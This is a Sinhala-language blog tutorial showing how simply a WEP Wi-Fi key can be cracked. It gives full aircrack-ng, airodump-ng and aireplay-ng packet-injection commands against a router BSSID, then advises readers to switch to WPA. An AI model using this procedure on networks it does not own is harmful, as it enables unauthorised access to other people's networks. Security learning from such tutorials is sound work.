open wireless networks ගැන සහ ඒවයේ ආරක්ෂාව ගැන කතාකරන්න දෙයක් නෑනෙ. ඕන කෙනෙක්ට සම්බන්ධ වෙන්න පුලුවන්. බොහොමයක් වයර්ලස් රව්ටර් වල WEP(Wired Equivalent Privacy) සහ WPA (Wi-Fi Protected Access) කියන autontication method දෙකම භාවිතා වෙනවා. WEP කියන්නෙ එච්චරම ආරක්ෂාකාරි ක්රමයක් නෙමයි. මේ බලන්න යන්නෙ WEP autontication method එක විදිට භාවිතා වෙන wireless ජාලයක network key එක අනවසරයෙන් ලබාගන්න කොච්චර පහසුයිද කියලා.
තියෙන්න ඕනා එකම අවශ්යතාවය තමා monitor mode පහසුකම භාවිතාකලහැකි wireless card එකක් තිබීම. wirleless router පාවිච්චි කරන අය දැකලා ඇති රව්ටරේ channel ID කියලා 1 ඉදලා 15 වෙනකම් වෙන ඉලක්කමක් හරි auto හරි කියලා සදහන් වෙලා තියනවා. සාමාන්ය drivers තුලදි wireless කාඩ් එකකට පුලුවන් අදාල එක channel එකක් ගැන අවධානයෙන් ඉන්න විතරයි. මොකද channel එක set කලාට පස්සෙ සිද්ධවෙන ගනුදෙනු වෙන්නෙ ඒක හරහා විතරයි නේ. නමුත් monitor mode සහය දක්වන card එකකට පුලුවන් 'එල්සිනා' වගේ අහල පහල හැමෝගෙම ඕපදූප ගැන හෙවිල්ලෙන් ඉන්න. මේ පහසුකම භාවිතා කරලා wireless ජාල වල ශක්තිය පරික්ෂා කරන්න හදලා තියන tool එකක් තමයි aircrack කියන්නෙ.
උබන්ටු තුල නම් aircrack ස්ථාපනය බොහොම ලේසියි. sudo apt-get install aircrack-ng විධානය මගින් ubuntu repository එක හරහා ස්වයංක්රීයවම ස්ථාපනය සිදුකරගන්න පුලුවන්. අලුත්ම නිකුතුව ඕනා නම් ඉතින්.
# sudo apt-get install build-essential libssl-dev libsqlite3-dev sqlite3 subversion iw subversion
කියලා dependencies ටික install කරගෙන කැමති තැනකට aircrack source එක බාගන්න පහත විධානයෙන්.
# sudo svn co http://trac.aircrack-ng.org/svn/trunk/ aircrack-ng
ඊටපස්සෙ aircrack-ng කියලා හැදුන folder එක ඇතුලට ගිහින් make සහ make install ලබාදෙන්න පහත පරිදි
# cd aircrack-ng
# sudo make
# sudo make install
ඔය විදි දෙකෙන් කැමති විදියකට aircrack ඉන්ස්ටෝල් කරගත්තට පස්සෙ බලන්න තියෙන්න ඔයාගෙ wireless card එක monitor mode සදහා සහය දක්වනවද කියලා. මේ සදහා
# sudo airmon-ng start < කාඩ් එකේ (wireless) නම (බොහෝ විට wlan0)> ලෙස විධානය ලබාදෙන්න
ඔන්න ඔය විදියට monitor mode enabled on
# aireplay-ng -9 mon0
දැං එහෙනං තියෙන්නෙ අහල පහල wireless තියන් ඉන්නෙ කව්ද කියලා හොයලා බලන්න
sudo airodump-ng mon0
මෙන්න මේ වගේ ප්රතිඒලයක් ලැබෙයි. විනාඩියකට විතර පස්සෙ ctrl+c ගහලා ස්කෑන් වෙන එක නවත්තන්න.
ඔය ENC එහෙම නැතිනම් encription කියන තීරුවෙ WEP කියලා තියන කව්රුහරි ඉන්නවනම් ඉතිං එයාගෙ ආරස්සාව ගැන කතාකරන්න දෙයක් නෑ. මේක චිස්තර කිරීමෙ පහසුව තකා මම මගේ රව්ටරේ encryption WEPවලට මාරු කරලා තියෙන්නෙ.
දැන් තියෙන්නෙ අදාල rowter එකෙන් සන්නිවේදනය කරන පැකට් වලට එල්සිනා පාර දාගෙන ඉන්න ගමන් ඒවා එකතු කරගන්න.
# airodump-ng -c <රව්ටරේ පාවිච්චි වෙන චැනල් එක> --bssid <රව්ටරේ bssid එක> -w <සේව් කරගන්න file name එකක්> mon0
# airodump-ng -c 2 --bssid 00:1C:26:AD:6C:16 -w output mon0
ඔහොම කියලා එයාට පාඩුවෙ වැඩේ කරගෙන යන්න දීලා තව terminal window එකක් ගන්න.
ඕපදූප නිකං අහං හිටියට වැඩක් නෑනෙ. එක දෙක කරන්න අපිත් පොඩි සපෝට් එකක් දෙන්න එපෑ. ඔය එහෙට මෙහෙට යන පැකට් අල්ලගෙන උවමනා විදියට වෙනස්කම් කරලා ආපහු අතඅරින්න කියන්නෙ මෙහෙමයි.
# aireplay-ng -3 -b <රව්ටරේ MAC Address එක> <මොනිට මෝඩ් ඉන්න කාඩ් එකේ නම>
# aireplay-ng -3 -b 00:1C:26:AD:6C:16 mon0
මේකෙන් වෙන්නෙ අර කලින් run වෙන්න දාපු airodump-ng විධානයේ ක්රියාවලිය වේගවත් කිරීම. අර කලිං කිව්ව වගේ ඕපදූප අහන් ඉදලා මදි, පොඩ්ඩක් ඒවා වෙනස් කරලා ගිනි තිබ්බම වැඩේ නැගලා යනවනෙ. ඔහොම වෙන අතරතුරේදි airodump-ng විධානය දෙනකොට දීපු නමෙන් (output කියලනෙ නම දුන්නෙ, මතකද?) හැදුන .cap file එකක ඔය ටික save වෙනවා.
ඔය data භාවිතා කරලා network key එක හොයන්න නම් IVs 100,000ත් 5,000,000ත් අතර ප්රමාණයක් උවමනා කරනවා. ඉහත command දෙකට run වෙන්න තියලා තවත් terminal window එකක්අරගෙන අර .cap ගොනුව භාවිතා කරලා key එක crack කරන්න කියලා විධානය දෙන්න මෙහෙම
# aircrack-ng -b <රව්ටරේ bssid එක> <සේව් කරගන්න දීපු file name එක>*.cap
# aircrack-ng -b 00:1C:26:AD:6C:16 output*.cap
ප්රමාණවත් තරම් IVs එකතු වෙනකොට මෙයා සැරින් සැරේ key එක crack කරන්න උත්සහ කරනවා. දැන් ඉතින් තියෙන්නෙ බලන් ඉන්න තමා. ජාලයේ ක්රියාකාරීත්වය මත මේකට ගතවෙන වෙලාව වෙනස් වෙන්න පුලුවන්.
ප්රමාණවත් තරම් (5000න් 5000ට) IVs එකතු වුනාම aircrack-ng ආපහු පාරක් network key එක extract කරන්න උත්සහ කරනවා. process එක ඉවරවෙනකම් ඉදලා screenshots නොදැමීම ගැන සමාවෙන්න.
මතක තියාගන්න, WEP සහ WPA දෙකම තියන රව්ටරයක ඔය දෙකම enable කරලා තියන එකෙන් ආරක්ෂාවට ලොකු තර්ජනයක් ඇතිවෙන වග. දම්වැලකත් ආරක්ෂිත පද්ධතියකත් සවිය රැදිලා තියෙන්න ඒකෙ දුර්වලම තැන. ඒක නිසා දෙකම තියනවනම් WPA විතරක් තියාගන්න. WEP විතරයි නම් තියෙන්නෙ පාවිච්චි කරන්න පුලුවන් උපරිම charactos ගනන යොදාගැනීමෙන් අවධානම යම්තාක් දුරකට අඩුකරගන්න පුලුවන්.
ලිපිය සදහා භාවිතා කල අනිත් resources
http://www.aircrack-ng.org/doku.php?id=simple_wep_crack